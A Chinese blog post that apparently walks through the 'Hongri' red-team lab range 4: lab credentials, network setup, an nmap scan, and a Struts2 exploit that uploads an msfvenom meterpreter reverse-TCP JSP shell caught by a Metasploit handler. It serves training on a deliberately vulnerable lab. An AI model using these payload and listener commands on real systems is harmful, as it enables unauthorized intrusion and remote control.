ATT&CK红队评估(红日靶场四)

靶场搭建

靶场下载地址:漏洞详情

共有三台主机DC、WEB、WIN7

机器密码

WEB主机 ubuntu:ubuntu

WIN7主机 douser:Dotest123

(DC)WIN2008主机 administrator:Test2008

网络配置

创建两个子网vmnet0和vmnet1

vmnet1:192.168.183.0

WEB主机网卡设置

WIN7主机网卡设置

DC主机网卡设置

攻击机kali的网卡和WEB主机的第一个出网网卡一致为NAT模式

WEB主机(Ubuntu)

DC主机(Windows 2008)

WIN7

WEB主机(Ubuntu)上启动环境

        sudo docker start ec 17 09 bb da 3d ab ad

渗透测试

扫描端口开放情况

nmap -sS -p 1-65535 -A 192.168.48.146

端口22开放,存在SSH服务

2001,2002,2003端口开放,存在WEB

看到2001使用了Struts2中间件

2002使用了Apache Tomcat中间件

2003为Apache、PHPmyadmin、mysql

访问WEB

2001端口

2002端口

2003端口,发现不需要密码就可以进入phpmyadmin后台

利用Struts2漏洞获得shell

使用了Struts2

直接使用工具进行检测和利用

利用漏洞上传msf马

生成msf马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f jsp > shell.jsp

msf启动监听

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set LHOST 192.168.48.136

exploit

访问马

成功收到会话

利用phpmyadmin后台获得shell

还可以利用phpmyadmin来使用数据库日志写入马来获得会话,这里就不做演示了,方法和之前的红日靶场一的一样,可以前往查看。链接:

  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值